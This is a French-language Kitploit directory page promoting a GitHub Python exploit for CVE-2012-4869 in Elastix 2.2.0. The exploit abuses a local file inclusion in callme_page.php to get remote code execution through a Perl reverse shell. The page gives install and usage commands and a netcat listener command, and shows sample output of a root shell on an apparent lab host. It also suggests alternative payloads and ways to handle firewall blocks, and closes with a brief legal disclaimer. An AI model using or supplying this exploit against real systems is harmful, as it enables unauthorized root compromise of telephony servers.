Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Elastix-2.2.0-CVE-2012-4869 — Script d'exploitation Python pour la vulnérabilité LFI d'Elastix 2.2.0 (CVE-2012-4869) permettant l'exécution de code à distance via l'injection de payload de reverse shell en Perl. | Kitploit
Outils/GitHubGitHub/cyberdesu/elastix-2.2.0-cve-2012-4869
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubcyberdesu/elastix-2.2.0-cve-2012-4869

Elastix-2.2.0-CVE-2012-4869

Script d'exploitation Python pour la vulnérabilité LFI d'Elastix 2.2.0 (CVE-2012-4869) permettant l'exécution de code à distance via l'injection de payload de reverse shell en Perl.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 1 anPas encore vérifié

Elastix 2.2.0 Exploit d'inclusion de fichier local - CVE-2012-4869

Description

Ce script exploite une vulnérabilité d'inclusion de fichier local (LFI) dans Elastix 2.2.0, permettant une exécution de code à distance (RCE) en injectant des commandes via le point de terminaison callme_page.php. L'exploit est basé sur CVE-2012-4869.

Fonctionnalités

  • Ignore la vérification des certificats TLS.
  • Utilise une charge utile reverse shell en Perl.
  • Prend en charge LHOST et LPORT personnalisés pour le reverse shell.
  • Supprime les avertissements de sécurité HTTPS.

Prérequis

  • Python 3
  • Module requests

Installez les dépendances avec :

root@kitploit:~
pip install requests

Utilisation

root@kitploit:~
python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>

Exemple:

root@kitploit:~
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001

Configuration du listener reverse shell

Avant d'exécuter l'exploit, démarrez un listener Netcat sur votre machine :

root@kitploit:~
nc -lvnp 9001

Sortie d'exécution de l'exploit

root@kitploit:~
[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001

[+] Exploit sent successfully, waiting for reverse shell...

[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)

Remarques

  • Si le reverse shell ne se connecte pas, assurez-vous que les règles du pare-feu et les paramètres SELinux autorisent les connexions sortantes.
  • Des charges utiles alternatives (par exemple, Bash ou Python) peuvent être utilisées si Perl n'est pas disponible.
  • Assurez-vous que votre LHOST est accessible depuis la machine cible.

Avertissement

Cet exploit est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. L'utilisation non autorisée est illégale. L'auteur n'est pas responsable d'une mauvaise utilisation de cet outil.

Télécharger l’outil